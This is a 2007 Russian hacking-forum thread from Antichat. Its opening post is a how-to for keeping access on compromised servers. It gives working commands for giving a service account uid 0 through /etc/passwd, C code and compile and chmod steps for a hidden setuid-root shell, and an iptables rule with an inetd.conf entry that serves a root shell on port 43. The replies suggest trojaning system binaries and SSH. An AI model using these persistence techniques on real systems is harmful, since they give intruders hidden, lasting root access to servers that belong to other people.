Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Методы закрепления на взломанных серверах. |

26.03.2007, 02:08
|
|
Познающий
Регистрация: 11.01.2007
Сообщений: 82
Провел на форуме: 592893
Репутация:
108
|
|
Методы закрепления на взломанных серверах.
Методы закрепления на взломанных серверах.
Вы взломали сервер, не важно как, может была уязвимость в программном обеспечении или же слабый пароль, [ sql | php]-инъекция, или все вместе(такое тоже бывает). На команду id вы получаете ответ id=0(root), gid=0(root), можете творить все что угодно, например, установить proxy, запустить brut, рассылать спам. Если просто заходить каждый раз под рутом рано или поздно админ вас заметит и сменит пароль, бывают и такие кому все равно, либо о безопасности ничего не знают и не хотят…. Что же их дело, а хакеры не спят, они как раз ищут такие системы.
Что же делать дальше? Как быстро закрепиться в системе?
Есть несколько известных мне способов:
/etc/passwd.
Этот способ прост и заключается в установке пароля и прав для таких учетных записей как: irc, www-data, news, mail, …. Сначала устанавливаем пароль для выбранной записи, затем редактируем файл /etc/passwd.
passwd irc
Enter new UNIX password: 123
После этого находим в файле passwd строчку:
Irc:x:39:39:ircd:/var/run/ircd:/bin/sh
заменим на
Irc:x:0:0:ircd:/var/run/ircd:/bin/sh
Мы изменили User ID и Group ID на такие же, как рута.
Минусы: Хороший администратор легко заметит разницу, но если файл объемный можно и не заметить.
Suid-bit.
Другой способ состоит из написания небольшой программки на С и установке для нее suid – бита.
Код:
#include <stdio.h>
void main()
{
Setuid(0);
System(“/bin/bash”);
}
Компилим: gcc shell.c –o shell
Устанавливаем права: chmod 4777 shell
Лучше скопировать куда-нибудь подальше. Например, в /lib/modules.
Минусы: Можно обнаружить с помощью команды find, у нее есть ключи поиска программ с установленным битом suid.
Inetd.conf
Этот метод не пройдет, если правильно настроен файрволл, поэтому нужный порт надо сперва открыть.Он состоит из добавления записи в Inetd.conf. Это демон отвечающий за некоторые сетевые приложения.
Открываем нужный порт:
iptables –A INPUT –p tcp –dport 43 –j ACCEPT
Добавляем запись:
whois stream tcp nowait root /bin/sh sh –i
whois(Имя) stream(Тип сокета) Протокол(tcp,udp) nowait( inetd продолжает слушать порт после соединения одного клиента) root (права с которыми будет запущена оболочка) /bin/bash( сама программа) .
Мы добавили новый сервис whois работает на 43 порту, список сервисов можно посмотреть в /etc/services. Теперь осталось соединится телнетом на 43 порт и запустится наша оболочка.
Минусы: Команда netstat видит этот порт.
Руткиты:
Писать про них не буду, так как уже есть несколько хороших статей.
Пользоваться руткитами удобнее и безопаснее, к тому же они имеют много хороших функций скрытие процессов, сетевых соединений, файлов и папок. Их труднее обнаружить, особенно “ядерные”.
Что можно еще добавить?
|
|
|

27.03.2007, 18:24
|
|
Участник форума
Регистрация: 04.02.2007
Сообщений: 120
Провел на форуме: 306837
Репутация:
36
|
|
Такое ощущение, что уже где-то читал об этом.
Хотя для тех, кто слышит это впервые, пойдет.
|
|
|

27.03.2007, 22:55
|
|
Участник форума
Регистрация: 11.09.2006
Сообщений: 239
Провел на форуме: 626169
Репутация:
167
|
|
Неплохой FAQ, но немного неполный (протроянивание системных утилит, добавление сервисным пользователям оболочки, etc).
|
|
|

27.03.2007, 23:18
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме: 21768337
Репутация:
3486
|
|
Руткиты:
Писать про них не буду, так как уже есть несколько хороших статей.
Мда. Про закрепление на сервере тоже есть много статей гораздо лучших чем твоя (если она твоя). Но ты же расписал уже про что то, будь добр закончи.
|
|
|

30.03.2007, 15:49
|
|
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме: 9089375
Репутация:
4268
|
|
Я думаю, стоит немного подождать=)
|
|
|

04.04.2007, 17:00
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме: 749524
Репутация:
715
|
|
После этого находим в файле passwd строчку:
Irc:x:39:39:ircd:/var/run/ircd:/bin/sh
заменим на
Irc:x:0:0:ircd:/var/run/ircd:/bin/sh
Мы изменили User ID и Group ID на такие же, как рута.
возможно, я ошибаюсь, но как ты поставишь uid=0, если уже есть пользователь (root) с таким id ?
|
|
|

04.04.2007, 18:19
|
|
Познающий
Регистрация: 11.01.2007
Сообщений: 82
Провел на форуме: 592893
Репутация:
108
|
|
Сообщение от p-range
возможно, я ошибаюсь, но как ты поставишь uid=0, если уже есть пользователь (root) с таким id ?
Если попытаться добавить пользователя через useradd, то система не даст этого сделать, напишет что-то типа "uid 0 уже существует", поэтому исправляем uid,gid в самом passwd.
|
|
|

04.04.2007, 21:50
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме: 1347723
Репутация:
1477
|
|
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
|
|
|

05.04.2007, 00:11
|
|
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме: 9089375
Репутация:
4268
|
|
Обсирать все горазды. inetd.conf - гавно способ.
Согласен с hsi, можно добавить про протроянивание бинарников и , самое интересное, добавление шелла сервисным пользователям. Но автор про это не хотел писать, как раз потому что это все знают. А вот как протороянить SSH, я не знал до сего дня.
Последний раз редактировалось Alexsize; 05.04.2007 в 00:17..
|
|
|

05.04.2007, 01:06
|
|
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме: 1347723
Репутация:
1477
|
|
Сообщение от fYt
Это вежливо-грубая форма "твоя статья отстой , а вот ссш рулит...".
Уважаемые, не ссорьтесь. Надеюсь, Alexsize не хотел тебя обидеть.
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|